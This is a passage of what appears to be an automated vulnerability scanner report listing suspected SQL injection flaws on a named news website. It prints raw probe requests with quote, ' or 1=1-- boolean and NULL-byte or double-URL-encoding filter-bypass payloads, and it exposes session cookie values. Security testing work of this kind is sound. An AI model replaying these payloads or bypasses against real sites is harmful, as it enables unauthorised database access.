<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the source request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /giants/ci_16793528?source=rss%2527 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Giants payroll likely to reach $120 million for the 2010 season'><meta name="keywords" ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16793528?source=rss%2527%2527 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/giants/ci_16793528?s ...[SNIP]...
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the currBrandCheck cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /high-school-sports/ci_16780570?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews%00'; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Gators get schooled by Country Day in championship match but surprised many by advancing so ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /high-school-sports/ci_16780570?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews%00''; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Gators get schooled by Country Day in championship match but surprised many by advancing so ...[SNIP]...
1.233. http://www.mercurynews.com/high-school-sports/ci_16780570 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.mercurynews.com
Path: /high-school-sports/ci_16780570
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /high-school-sports/ci_16780570?1%2527=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Gators get schooled by Country Day in championship match but surprised many by advancing so ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /high-school-sports/ci_16780570?1%2527%2527=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/high-school-sports/c ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /high-school-sports/ci_16781152?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false'; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Hungry Rams fill their appetite in a 47-14 triumph.'><meta name="keywords" conten ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/high-school-sports/c ...[SNIP]...
The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. The payloads 19376229'%20or%201%3d1--%20 and 19376229'%20or%201%3d2--%20 were each submitted in the JSESSIONID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /high-school-sports/ci_16781473 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA19376229'%20or%201%3d1--%20; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Piedmont Hills receivers come through to help the program win its first CCS title.'><meta name="keywords" content="SportsRaiders SportsGiants SportsAthletics cal santaclara"/><title>CCS Division I football final: Piedmont Hills defeats Homestead - San Jose Mercury News</title><script language="JavaScript"> document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/mercury/favicon.ico" type="image/x-icon">'); document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/mercury/favicon.ico" type="image/x-icon">'); </script>
<script src="http://extras.mnginteractive.com/live/js/Brightcove/MercuryNews/MobileCompatibility.js"></script> <Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "mercurynews.Sports.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get ...[SNIP]...
Request 2
GET /high-school-sports/ci_16781473 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA19376229'%20or%201%3d2--%20; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/high-school-sports/ci_16781473?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 07:24:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 07:24:06 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 453
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/high-school-sports/ci_16781473?nclick_check=1&forced=true">here</a>.</p> <hr> <address>Apache/2.0.52 (Red Hat) Server at www.mercurynews.com Port 80</address> </body></html>
The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JSESSIONID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /high-school-sports/ci_16781501?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA'; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Santa Clara Valley high school results'><meta name="keywords" content="SportsRaiders Sports ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /high-school-sports/ci_16781501?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA''; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/high-school-sports/c ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /high-school-sports/ci_16781501?source=rss%00' HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Santa Clara Valley high school results'><meta name="keywords" content="SportsRaiders Sports ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /high-school-sports/ci_16781501?source=rss%00'' HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/high-school-sports/c ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /high-school-sports/ci_16792321 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Santa Clara Valley high school results'><meta name="keywords" content="SportsRaiders Sports ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /high-school-sports/ci_16792321 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/high-school-sports/c ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /nation-world/ci_16796747 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='DUBLIN—Ireland must endure the toughest cuts and tax hikes in its history as an unavo ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]... <p>Lenihan conceded that a failure to secure the EU-IMF bailout would have raised "serious doubts" about Ireland's ability to pay its bills from mid-2011 onward.<span fd-type="end" fd-id="default"> ...[SNIP]...
Request 2
